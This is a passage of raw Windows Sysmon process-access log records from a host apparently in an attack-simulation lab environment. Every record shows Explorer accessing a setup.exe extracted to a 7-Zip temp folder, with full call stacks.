13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Te